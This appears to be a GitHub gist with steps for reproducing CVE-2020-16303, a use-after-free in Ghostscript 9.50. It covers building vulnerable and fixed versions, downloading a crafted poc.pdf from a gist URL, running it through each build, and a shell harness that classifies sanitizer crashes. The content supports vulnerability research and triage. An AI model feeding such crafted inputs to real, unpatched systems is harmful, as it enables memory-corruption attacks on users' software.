- Download Ghostscript/GhostPDL v9.50 from the project's GitHub releases.
- You need both the official prebuilt binary and the source code.
- Official build (without the fix):

```sh
wget https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs950/ghostscript-9.50-linux-x86_64.tgz
```

- Official build (with the fix):

```sh
wget https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs951/ghostscript-9.51-linux-x86_64.tgz
```

- Compile from source in the following steps:
  - Get the source code:

    ```sh
    git clone git@github.com:ArtifexSoftware/ghostpdl.git
    ```

  - Check out the vulnerable revision:

    ```sh
    git checkout b5bc53eb7
    ```

  - Make sure gcc, make and autoconf are installed:

    ```sh
    sudo apt install gcc
    sudo apt install make
    sudo apt install autoconf
    ```

  - Run `./autogen.sh`.
  - Run `make sanitize` to produce a sanitizer-instrumented build.
  - The resulting binaries are placed in the `sanbin` folder.
- Download the crafted input file `poc.pdf` from this page:

```sh
wget https://gist.githubusercontent.com/yunpengn/2a997a30ea798c2a2f1ac2fc89d31106/raw/0296f78472ab6da2f296ab7a0584e47cebd08d74/poc.pdf
```

- Run the following commands to reproduce the vulnerability against each build (`gs`, `gs-debug`, `gs-san` and `gs-fix` are the binary names used on this page):

```sh
./gs -dBATCH -dNOPAUSE -dSAFER -dNOTRANSPARENCY -sOutputFile=tmp -sDEVICE=xpswrite ./poc.pdf
./gs-debug -dBATCH -dDEBUG -dNOPAUSE -dSAFER -dNOTRANSPARENCY -dPDFSTOPONERROR -sOutputFile=tmp -sDEVICE=xpswrite ./poc.pdf
./gs-san -dBATCH -dNOPAUSE -dSAFER -dNOTRANSPARENCY -sOutputFile=tmp-san -sDEVICE=xpswrite ./poc.pdf
./gs-fix -dBATCH -dNOPAUSE -dSAFER -dNOTRANSPARENCY -sOutputFile=tmp-fix -sDEVICE=xpswrite ./poc.pdf
```
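As an added example (not part of the gist), a small shell harness that runs `poc.pdf` through each of the four builds named above and classifies the outcome from the exit status and any AddressSanitizer report on stderr, so that the sanitizer build's report and the clean result of the 9.51 build can be compared in one run. The `classify_log`, `first_frame` and `run_build` helpers, the `out-<binary>` output names and the sample log used for testing are assumptions of this example, not the author's.

```shell
#!/bin/sh
# Added example: triage harness for the Ghostscript PoC run.
# Binary names gs, gs-debug, gs-san, gs-fix follow the gist; everything
# else here is ours. The common flag set from the gist is used for all
# builds (the author's gs-debug run additionally passes -dDEBUG and
# -dPDFSTOPONERROR).
GS_ARGS="-dBATCH -dNOPAUSE -dSAFER -dNOTRANSPARENCY -sDEVICE=xpswrite"

# classify_log LOGFILE EXITSTATUS
# Prints one of: asan:<report-type>, crash:signal-N, error:exit-N, clean
classify_log() {
    local log="$1" status="$2" kind
    if kind=$(grep -m1 -o 'ERROR: AddressSanitizer: [A-Za-z_-]*' "$log"); then
        printf 'asan:%s\n' "${kind#ERROR: AddressSanitizer: }"
    elif [ "$status" -ge 128 ]; then
        # Shells report a signal death as 128 + signal number.
        printf 'crash:signal-%d\n' "$((status - 128))"
    elif [ "$status" -ne 0 ]; then
        printf 'error:exit-%d\n' "$status"
    else
        printf 'clean\n'
    fi
}

# first_frame LOGFILE
# Prints the innermost frame ("#0 ... in <function file:line>") of an ASan report, if any.
first_frame() {
    sed -n 's/^ *#0 0x[0-9a-fA-F]* in //p' "$1" | head -n 1
}

# run_build BINARY
# Runs the PoC through ./BINARY and prints "BINARY verdict [top frame]".
run_build() {
    local bin="$1" log status
    log=$(mktemp)
    if "./$bin" $GS_ARGS -sOutputFile="out-$bin" ./poc.pdf >"$log" 2>&1; then
        status=0
    else
        status=$?
    fi
    printf '%-10s %s %s\n' "$bin" "$(classify_log "$log" "$status")" "$(first_frame "$log")"
    rm -f "$log"
}

# Run every build that is present in the current directory.
for bin in gs gs-debug gs-san gs-fix; do
    if [ -x "./$bin" ]; then run_build "$bin"; fi
done
```

Expected result when reproducing the gist: `gs-san` reports `asan:heap-use-after-free` with the faulting frame, while `gs-fix` reports `clean` or a plain PDF error.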
Last active: September 24, 2021 14:24
CVE-2020-16303 use-after-free vulnerability in Artifex Software GhostScript v9.50